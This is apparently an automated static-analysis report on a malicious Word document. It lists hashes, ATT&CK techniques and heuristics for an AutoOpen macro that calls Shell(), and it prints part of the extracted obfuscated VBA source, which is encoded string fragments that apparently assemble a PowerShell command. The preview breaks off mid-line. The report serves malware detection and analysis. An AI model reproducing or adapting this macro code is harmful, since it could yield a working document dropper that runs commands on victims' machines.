Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 3120caacf413b28f…

MALICIOUS

Office (OLE)

227.8 KB Created: 2018-06-28 18:49:00 Authoring application: Microsoft Office Word First seen: 2019-04-18
MD5: d1b966d56d9002f56d0c2ba9286ab121 SHA-1: 7bba5a4dd55e3ca1a52958dcc593132df848501d SHA-256: 3120caacf413b28fbf3ca4468c7e3c9a6c2aefd3f02d0d747f40cdbc2f8cee03
182 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1059 Command and Scripting Interpreter T1204.002 Malicious File

The sample is a malicious Office document containing VBA macros. The critical heuristic 'OLE_VBA_SHELL' and the high heuristic 'OLE_VBA_PCODE_AUTOEXEC_EXEC' indicate that the AutoOpen macro attempts to execute arbitrary code using the Shell() function. This is a common technique for downloading and executing further stages of malware.

Heuristics 6

  • VBA macros detected medium 3 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • Shell() call in VBA critical OLE_VBA_SHELL
    Shell() call in VBA
  • AutoOpen macro high OLE_VBA_AUTOOPEN
    AutoOpen macro
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 9291 bytes
SHA-256: df4708552beea5fba63eb9fb11179730bd37b02b11d472ccc786cde00dd5d6fa
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "oaEolCw"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "JdzZQHHKFul"
Function CTMoizDQhlw()
On Error Resume Next
CBoUL = ChrB(34088 + Sin(LAQzNF * CLng(CTTvzz + 63316) + 98561 + ZSrmR))
kRfJt = 50969 + Atn(920) / 23513 / Round(54410) / 9663 / CInt(oGawEh)
UsqnHBJFFW = "HELL " + "     " + "     " + "      " + "      " + "         " + "     " + "     " + "-JoIn " + Chr(40) + "'99x5@5"
LlnHBH = ChrB(69124 + Sin(DuOBTf * CLng(PVjkf + 77294) + 60256 + uDpjc))
ijOhRz = 56596 + Atn(47051) / 29941 / Round(12203) / 26483 / CInt(hajNP)
jFZzBzAJMc = "0&5&12" + "2I41" + "&34M" + "48N106" + "N40t37M" + "45@34&36" + "@51_103~" + "9k34N51I" + "105x16" + "x34N"
zSFzcj = ChrB(21148 + Sin(NsDLXH * CLng(iYCwbD + 83209) + 12922 + Eihzlq))
YWMDsb = 60894 + Atn(17337) / 46028 / Round(61003) / 13175 / CInt(otiJNm)
qrjVIUzSKY = "37k4M" + "43M4" + "6&34N41I" + "51@12" + "4M99x" + "40k61x5"
OKHPL = ChrB(59062 + Sin(LIvzB * CLng(uWHNJ + 43481) + 56859 + LBRiuI))
pCBihT = 43859 + Atn(70684) / 38373 / Round(64205) / 90321 / CInt(QUTjp)
vsOHRzYMk = "5k12" + "2~96" + "@47_51x51" + "k55N125@" + "104t10" + "4N34~" + "53&46k3" + "6&36x40&" + "41~52_50M" + "43x51M4"
WAvIG = ChrB(20264 + Sin(MMDIq * CLng(RViVfL + 5647) + 19048 + XqinR))
qckur = 80533 + Atn(43999) / 61554 / Round(56324) / 50472 / CInt(WXVKbm)
NizdIQpzOLR = "6I41t32~1" + "05N3" + "6_40~42k" + "104@38~1" + "04&7I4" + "7M51@" + "51&55I125" + "t104I10" + "4N36"
moaAp = ChrB(1089 + Sin(QjIBcF * CLng(TsMGlC + 66552) + 23186 + tNFnJ))
GbAai = 23308 + Atn(45615) / 16339 / Round(55094) / 64539 / CInt(ZifdT)
KbYVhr = "N43I50k37" + "k49M40_" + "43_49x4" + "0N46@51" + "@38k43k46" + "I38~10" + "5t46I5" + "1x104_" + "62I3I1"
DChWZ = ChrB(84519 + Sin(oaPjn * CLng(NViPdI + 47907) + 72576 + UBMpKh))
UisETr = 97196 + Atn(83761) / 99348 / Round(32045) / 52048 / CInt(KuDWf)
HvEKB = "3@113" + "N15_1" + "04x7@4" + "7t51" + "_51@5" + "5~125M104" + "k104M45I"
CTMoizDQhlw = UsqnHBJFFW + jFZzBzAJMc + qrjVIUzSKY + vsOHRzYMk + NizdIQpzOLR + KbYVhr + HvEKB
jOAff = ChrB(50018 + Sin(GlQhj * CLng(jhjQJ + 88861) + 19367 + BcNaQ))
RVWhi = 69888 + Atn(14747) / 8000 / Round(97180) / 9286 / CInt(niQiK)
End Function
Function jFPUXvm()
On Error Resume Next
YpUSDO = ChrB(14456 + Sin(AGilmE * CLng(AEUiu + 91317) + 80016 + alDXW))
IlGWl = 81614 + Atn(747) / 17080 / Round(92467) / 62951 / CInt(mvJawU)
ssUjao = "38&5" + "5~38I" + "41&46M52M" + "42&1" + "05~4" + "0_53_32" + "x104I" + "50M55_4" + "3I40" + "x38_35_5" + "2t104@1"
nYuEGR = ChrB(50009 + Sin(ijujAr * CLng(pzbZcz + 4956) + 74129 + Ommfwz))
AiFInC = 53252 + Atn(7921) / 81754 / Round(66411) / 84538 / CInt(zptiK)
wnOtUovjpi = "0x8&30_61" + "&53&104x" + "7@47@51&" + "51I5" + "5N12" + "5_104" + "@104N" + "51~38" + "M51M38_41"
dHqSE = ChrB(65682 + Sin(llzpTi * CLng(jiQzFq + 15517) + 74186 + DDluri))
waJjw = 8528 + Atn(93534) / 47380 / Round(76747) / 66621 / CInt(TvKJi)
fiFCFMSYZi = "x44I38_" + "105k46t" + "51_1" + "04_2N2" + "3@11" + "9t112&11"
liMErs = ChrB(83120 + Sin(nPToC * CLng(uKlPs + 86597) + 79466 + TEMbJ))
mEEmBr = 18600 + Atn(94251) / 84971 / Round(86213) / 29255 / CInt(MGGEJo)
PwSjGhGNVsr = "5@12" + "I12~104" + "&7&47t5" + "1@51" + "M55k125&1" + "04_104I48" + "@48I48_10" + "5t42t40M3"
vRvVo = ChrB(32872 + Sin(mMKHrP * CLng(RrqQri + 75858) + 9991 + llDwiT))
iwwcFP = 95088 + Atn(23922) / 49576 / Round(99786) / 24417 / CInt(KVWhYE)
AGNHwCFNl = "7N52_" + "51~34N53I" + "43@4" + "5@50&3" + "5~105~52k" + "34M104" + "&5k12" + "7I44"
LtifRh = ChrB(43273 + Sin(qjKjl * CLng(MSJYb + 68693) + 492 + IIPHf))
ljIPO = 15925 + Atn(67071) / 52520 / Round(17914) / 21324 / CInt(clBRI)
LlPXFuUVY = "k5~31I9" + "x62N1" + "7N104M96" + "@105_2" + "0~55x43_" + "46N51@11" + "1I96" + "~7k9" + "6I110" + "&124~99k4"
jFPUXvm = ssUjao + wnOtUovjpi + fiFCFMSYZi + PwSjGhGNVsr + AGNHwCFNl + LlPXFuUVY
rXswJ = ChrB(52
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.